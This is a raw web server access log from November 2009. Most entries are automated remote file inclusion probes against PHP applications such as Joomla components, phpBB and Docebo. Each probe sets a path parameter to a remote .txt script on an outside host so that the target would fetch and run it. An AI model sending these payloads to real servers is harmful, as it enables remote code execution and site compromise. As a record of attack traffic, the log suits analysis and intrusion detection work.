207.14.32.241 - - [01/Nov/2009:01:27:58 -0400] "GET /logs/access_log.Q109051400%20%20/appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:27:59 -0400] "GET /appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:28:00 -0400] "GET /logs/access_log.Q109072900%20%20/?INCLUDE_FOLDER=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:28:04 -0400] "GET /logs/access_log.Q109092600%20%20/appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.230.123.88 - - [01/Nov/2009:01:28:24 -0400] "GET //dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
85.94.33.242 - - [01/Nov/2009:01:28:44 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.7806320.ru/image?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
85.94.33.242 - - [01/Nov/2009:01:28:44 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.7806320.ru/image?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
67.195.110.164 - - [01/Nov/2009:01:28:49 -0400] "GET /logs/error_log.Q107121500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.14.32.241 - - [01/Nov/2009:01:29:10 -0400] "GET /appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:29:14 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:29:18 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:29:19 -0400] "GET /logs/access_log.Q109092600/appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:29:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.64.94.64 - - [01/Nov/2009:01:29:49 -0400] "GET /logs/access_log.Q109100300//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.236.47.182 - - [01/Nov/2009:01:30:04 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.236.47.182 - - [01/Nov/2009:01:30:04 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.182 - - [01/Nov/2009:01:30:04 -0400] "GET /logs/access_log.Q109081700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:30:30 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:30:30 -0400] "GET /logs/access_log.Q109092600/appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:30:32 -0400] "GET /logs/access_log.Q109071100//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:30:32 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:30:32 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:30:40 -0400] "GET /logs/access_log.Q109092600//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.236.47.182 - - [01/Nov/2009:01:30:59 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.236.47.182 - - [01/Nov/2009:01:30:59 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.238.2.226 - - [01/Nov/2009:01:31:08 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.238.2.226 - - [01/Nov/2009:01:31:08 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.238.2.226 - - [01/Nov/2009:01:31:08 -0400] "GET /logs/access_log.Q109071100//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
218.238.2.226 - - [01/Nov/2009:01:31:08 -0400] "GET /logs/access_log.Q109092600//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.236.47.182 - - [01/Nov/2009:01:31:26 -0400] "GET /logs/access_log.Q109052400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:31:47 -0400] "GET /logs/access_log.Q109071100%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:31:47 -0400] "GET /logs/access_log.Q109092600%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:32:16 -0400] "GET /logs/access_log.Q109100300//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:32:29 -0400] "GET /logs/error_log.Q109090900%20%20/?INCLUDE_FOLDER=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:32:44 -0400] "GET /logs///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:32:44 -0400] "GET ///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:32:44 -0400] "GET /logs/access_log.Q109081200///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:32:44 -0400] "GET ///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:32:44 -0400] "GET /logs/access_log.Q109081200///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:32:44 -0400] "GET /logs///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:01:32:49 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:01:32:49 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:01:32:49 -0400] "GET /logs/access_log.Q109083100//include/mail.inc.php?skin_board_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:01:32:49 -0400] "GET /logs/access_log.Q109091000//include/mail.inc.php?skin_board_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:32:51 -0400] "GET /logs/access_log.Q109072200///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:32:51 -0400] "GET /logs/access_log.Q109072200///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
219.127.87.143 - - [01/Nov/2009:01:33:00 -0400] "GET //phpBB2/groupcp.phpphpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
221.143.29.189 - - [01/Nov/2009:01:33:00 -0400] "GET /logs/access_log.Q109071100%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
219.127.87.143 - - [01/Nov/2009:01:33:02 -0400] "GET /logs//phpBB2/groupcp.phpphpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
121.78.116.203 - - [01/Nov/2009:01:33:17 -0400] "GET /logs/access_log.Q109062100%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:33:19 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:33:19 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:33:21 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:33:21 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:33:21 -0400] "GET /logs/access_log.Q109062100%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
221.143.29.189 - - [01/Nov/2009:01:33:25 -0400] "GET /logs/access_log.Q109092600%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:33:29 -0400] "GET /logs/access_log.Q109090900%20%20/?INCLUDE_FOLDER=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:33:29 -0400] "GET /logs/error_log.Q109071200%20%20/?INCLUDE_FOLDER=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:33:31 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:33:33 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:33:38 -0400] "GET ///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:33:38 -0400] "GET /logs/access_log.Q109081200///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:33:38 -0400] "GET /logs///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:33:38 -0400] "GET /logs/access_log.Q109072200///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
221.143.29.189 - - [01/Nov/2009:01:33:41 -0400] "GET /logs/access_log.Q109100300%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
221.143.29.189 - - [01/Nov/2009:01:33:41 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.218.116.132 - - [01/Nov/2009:01:33:53 -0400] "GET /logs/access_log.Q109101700 HTTP/1.0" 200 3075700 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [01/Nov/2009:01:34:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.103.72.130 - - [01/Nov/2009:01:34:29 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:34:29 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:34:30 -0400] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:01:34:35 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:34:35 -0400] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:01:34:36 -0400] "GET /logs/access_log.Q109081400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:34:38 -0400] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:34:38 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:34:38 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:34:44 -0400] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:34:53 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:34:53 -0400] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:34:54 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:34:55 -0400] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:35:12 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:35:13 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:01:35:16 -0400] "GET /logs/access_log.Q109083100%20%20//include/mail.inc.php?skin_board_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:01:35:16 -0400] "GET /logs/access_log.Q109091000%20%20//include/mail.inc.php?skin_board_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:35:21 -0400] "GET /logs/access_log.Q109072900%20%20///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:35:33 -0400] "GET /logs/access_log.Q109090900%20%20///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:35:45 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:35:45 -0400] "GET ///vwar/backup/errors.php?error=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:35:45 -0400] "GET /logs/access_log.Q109072500%20%20///vwar/backup/errors.php?error=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:35:45 -0400] "GET /logs/access_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:35:45 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:35:45 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:35:49 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:35:49 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:35:49 -0400] "GET /logs/access_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:35:51 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:35:51 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:35:51 -0400] "GET /logs/access_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:35:53 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:35:54 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:35:55 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:36:09 -0400] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:36:09 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:36:14 -0400] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:36:25 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:36:26 -0400] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:36:26 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:36:27 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:36:27 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:36:27 -0400] "GET /logs/access_log.Q109062100%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:36:36 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:36:37 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:36:37 -0400] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.12.13.152 - - [01/Nov/2009:01:36:41 -0400] "GET /logs/access_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
81.12.13.152 - - [01/Nov/2009:01:36:41 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
81.12.13.152 - - [01/Nov/2009:01:36:41 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:36:43 -0400] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:36:50 -0400] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.12.13.152 - - [01/Nov/2009:01:36:53 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:36:56 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:37:00 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
